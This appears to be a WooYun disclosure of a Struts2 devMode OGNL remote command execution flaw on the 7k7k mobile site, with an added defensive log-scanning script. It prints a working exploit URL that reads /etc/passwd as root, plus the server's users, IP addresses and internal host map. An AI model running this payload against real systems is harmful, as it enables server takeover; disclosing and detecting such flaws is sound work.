
奇客星空 development mode misconfiguration vulnerability leads to command execution (root privileges)

2014-04-20 01:05

#1. Seeing how quickly 奇客星空 confirms vulnerabilities, I thought I would dig up a few for them. Looking through their vulnerability history, I happened to see WooYun: 奇客星空代码执行导致分站沦陷 (code execution leads to sub-site compromise). That report concerned a Struts2 framework vulnerability, which is completely different from the one I am submitting now, and the vendor replied: fixed. To show that the vendor really has fixed the Struts2 vulnerability, here is this screenshot:

URL: http://m.7k7k.com/about.html (this would be the mobile version of 奇客星空, I suppose (⊙_⊙)?)

01.jpg





#2. Then I thought I would check whether debug mode was enabled and try the latest S2-019 vulnerability [in Apache Struts versions before 2.3.15.2 the "Dynamic Method Invocation" mechanism is enabled by default, and users are merely advised to disable it where possible; this creates a remote code execution vulnerability that a remote attacker can exploit to execute arbitrary code in the context of the affected application]. So I tested it, and it was a disaster →_→

EXP: http://m.7k7k.com/about.html?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29

02.jpg

And it is running as root, too =_=|

03.jpg





Proof of vulnerability:

#3.

cat /etc/passwd/

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/



uname -a

Linux Ct-gc-bj136 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux null



ifconfig -a

eth0 Link encap:Ethernet HWaddr 00:16:3E:13:E2:A4
inet addr:115.182.59.136 Bcast:115.182.59.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19472163956 errors:0 dropped:0 overruns:0 frame:0
TX packets:182413747 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1324808432359 (1.2 TiB) TX bytes:80369708814 (74.8 GiB)

eth1 Link encap:Ethernet HWaddr 00:16:3E:34:0A:4D
inet addr:192.168.11.136 Bcast:192.168.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1446599118 errors:0 dropped:0 overruns:0 frame:0
TX packets:1016118809 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:490211357961 (456.5 GiB) TX bytes:473975578474 (441.4 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0



cat /etc/hosts

127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6

115.182.59.176 so.7k7k.com
192.168.11.108 Ct-bj108
192.168.11.31 Ct-bj31
192.168.11.136 Ct-gc-bj136
127.0.0.1 top.7k7k.com
192.168.11.149 api.cms.7k7k.com

115.182.59.250 s.7k7k.com
115.182.59.251 s.7k7k.com
115.182.59.252 s.7k7k.com

Remediation:

PS: For the vulnerability details, see http://struts.apache.org/release/2.3.x/docs/s2-019.html. With command execution in hand, is a webshell ever far away? Demonstrating the severity of the vulnerability is enough. I hope the vendor gives this a high rank, and I am asking for a gift =_=. This is our first time working together; I will come back later and find a few more vulnerabilities for you.
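As an added defender-side example (my code, not part of the original report or of Struts), the following Python flags web-server access-log requests that carry the devMode `debug=command` parameter or the OGNL markers used in the payload above. The log lines, IPs and the shortened payload are constructed; the request format assumed is the common Combined Log Format.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters read by the Struts 2 DebuggingInterceptor, which is only active when
# struts.devMode=true; debug=command evaluates the "expression" value as OGNL.
DEBUG_MODES = {"command", "xml", "console", "browser"}
# OGNL fragments from the report's payload (sandbox bypass, static access, process spawn).
OGNL_MARKERS = ("#_memberAccess", "allowStaticMethodAccess", "@org.apache.struts2",
                "java.lang.ProcessBuilder", "java.lang.Runtime")

def analyze_request(url):
    """Return the reasons a request URL looks like a devMode/OGNL probe ([] if none)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    reasons = []
    for mode in query.get("debug", []):
        if mode.lower() in DEBUG_MODES:
            reasons.append("debug=" + mode)
    for expr in query.get("expression", []):
        expr = unquote(expr)  # second decode catches double-encoded payloads
        hits = [m for m in OGNL_MARKERS if m in expr]
        if hits:
            reasons.append("ognl:" + ",".join(hits))
    return reasons

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def scan_log(lines):
    """Yield (client_ip, status, reasons) for each suspicious Combined-Log-Format line."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        reasons = analyze_request(path)
        if reasons:
            yield ip, status, reasons

# Constructed sample log (hypothetical IPs; payload shortened from the report's EXP URL).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Apr/2014:01:05:00 +0800] "GET /about.html?debug=command'
    '&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField(%27allow'
    'StaticMethodAccess%27)%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java'
    '.lang.String[]{%27id%27})).start() HTTP/1.1" 200 1134',
    '198.51.100.7 - - [20/Apr/2014:01:06:12 +0800] "GET /about.html?debug=1 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [20/Apr/2014:01:07:45 +0800] "GET /search?expression=1%2B1 HTTP/1.1" 404 221',
]

if __name__ == "__main__":
    for ip, status, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, "; ".join(reasons))
```

A `debug` value outside the interceptor's known modes, or an `expression` without OGNL markers, is deliberately not flagged so that ordinary application parameters of the same name do not raise alerts.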


Source: www.wooyun.org/bugs/wooyun-2014-052891
